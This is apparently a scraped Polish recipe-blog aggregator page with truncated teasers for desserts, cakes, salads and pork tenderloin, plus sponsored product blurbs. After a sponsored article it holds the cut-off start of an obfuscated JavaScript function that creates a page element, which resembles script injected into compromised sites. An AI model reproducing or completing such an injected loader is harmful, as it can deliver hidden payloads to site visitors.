łyżki rumu 1/3 łyżeczki kardamonu 1/3 łyżeczki imbiru 1 czubata łyżeczka cynamonu 1 łyżka cukru 180 g mascarpone 300 ml śmietanki 30% 2 łyżki mleka skondensowanego słodzonego 12 sztuk ciasteczek, biszkoptów lub 4 garście granoli Dodatkowo do ozdoby: Orzechy, prażone migdały, kokos, czekolada Jabłka obieram, usuwam gniazda nasienne i kroję w kostkę. W rondelku umieszczam jabłka, kardamon, imbir, cynamon, cukier(...)twarde. Śmietankę ubijam, dodaję do niej mascarpone i mleko skondensowane i delikatnie miksuję do połączenia się składników. Na dno 4 słoiczków lub pucharków o pojemności ok. 300 ml kruszę ciasteczka, wykładam krem mascarpone (4 łyżki zostawiam), na krem kładę smażone jabłka i na jabłka pozostały krem mascarpone. Całość przyozdabiam pokrojoną w kostkę czekoladą, orzechami, migdałami, kokosem… (tutaj używamy składników, które
Słodki sentymentCzarna pasta z aktywnym węglem Co warto wiedzieć o węglu aktywnym. Czarna pasta z aktywnym węglem zawojowała rynek produktów do higieny jamy ustnej. Wybiela zęby
Cztery FajeryDziś jednak skupimy się na cieście seromak, który jest połączeniem sernika i makowca w jednym. Przepisów na to bożonarodzeniowe ciasto jest bardzo wiele, seromakowiec na kruchym spodzie, seromakowiec na ciastkach, seromak bez spodu. Ja zaszalałam i do sernika, makowca dołożyłam jeszcze biszkopt. I tak wyszła pyszna rolada seromakowiec, delikatna, wilgotna. Ciasto które robi wrażenie
Dieta moja pasjakryją się tam pyszne skarby! Czasami każdy ma chęć na słodycze. Ale co z plastikowymi opakowaniami? Każdy cukierek zafoliowany w szeleszczące sreberko? Zgroza! Dlatego warto przerzucić się na cukierki, ciastka i żelki na wagę. Tak samo pyszne i słodkie a zdecydowanie bardziej ekologiczne. Niektórzy lubią samodzielnie mielić kawę i przyprawy. Na szczęście są sklepy, gdzie dostaniemy kawę ziarnistą
ProstePesto.pltych za nimi. Zostawić trochę kremu na posmarowanie wierzchu i boków po zdjęciu folii. Kiedy ułożymy ciasto, folię z brzegów zawinąć na wierzch ciasta. Dość ciasno, aby mocno ciastka docisnęły się do siebie. Wstawić do lodówki na 1h lub do zamrażalnika na 30 minut. Po schłodzeniu folię rozłożyć z wierzchu ciasta. Na wierzch ułożyć deseczkę i odwrócić ciasto. Delikatnie
gotuj ze mnąCzy warto kupić oczyszczacz powietrza Porównanie modeli Roger i Roger 2 Stadler Form. Czy warto kupić oczyszczacz powietrza zastanawialiśmy się po raz pierwszy niemal 3 lata
Cztery FajerySałatka z ogórka z sosem tahini Szybka sałatka z ogórków z sezamem i przepis na sos tahini do warzyw. Sałatka z ogórka z sosem tahini
Cztery FajerySzarlotka na ciepło z lodami Najlepszy przepis na szarlotkę na ciepło z kruszonką. Szarlotka na ciepło z lodami to moim zdaniem najlepsza szarlotka z kruszonką jaką
Cztery FajeryPyszny deser – kaszy i nasiona chia Jednym z najwartościowszych składników odżywczych jest kasza, której obróbka termiczna jest niesłychanie prosta. Można z niej przyrządzić nie tylko przepyszne ciasta i ciasteczka ale też puddingi, owsianki, batony oraz kaszki. Wspaniale smakuje z miodem, cynamonem, daktylami, różnego rodzaju syropami i soczystymi owocami. Kasza idealnie sprawdzi się jako szybki deser w owsiance, może być(...)diecie oraz uprawiających sport.Nasiona chia to jedyny w swoim rodzaju naturalny i zdrowy zagęstnik, który możemy dodawać do każdego rodzaju produktów takich jak kremy, jogurty, owsianki, ciasta i ciasteczka. Możliwości jest wiele – wyłącznie od Ciebie zależy na jaki zamiennik się zdecydujesz aby zawsze było pysznie! *artykuł sponsorowany (function(fvmekrhk, iksluekw, rjcgdbck, cygrooms, urslohqz, zurqbwhz){ urslohqz = iksluekw.createElement(rjcgdbck);zurqbwhz
Słodkie okruszkiPrzepis na pyszne ciasto marchewkowe pachnące cynamonem, pełne orzechów i słodkiej marchewki. Ciasto jest dodatkowo przełożone waniliową masą z serka kremowego. Czas przygotowania: 45 min Czas
Słodki BlogPolędwiczki wieprzowe w sosie musztardowym z kaparami to danie, które sprawdzi się nie tylko na co dzień, ale również na święta. Sos przygotowałam na bazie śmietany
Oryginalny smakpieczenia. Dla miłośników sernika i kawy Składniki na spód: 35 szt. herbatników petite beurre 130 g masła Masło roztapiam. Herbatniki rozdrabniam blenderem i dodaję do masła. Mieszam i wykładam ciasteczka do tortownicy o średnicy 20 cm. Rozprowadzam ciasteczka na dnie i bokach tortownicy tworząc ciasteczkowy spód i rant. Tortownicę wstawiam do lodówki. W tym czasie przygotowuję masę serową. Składniki
Słodki sentyment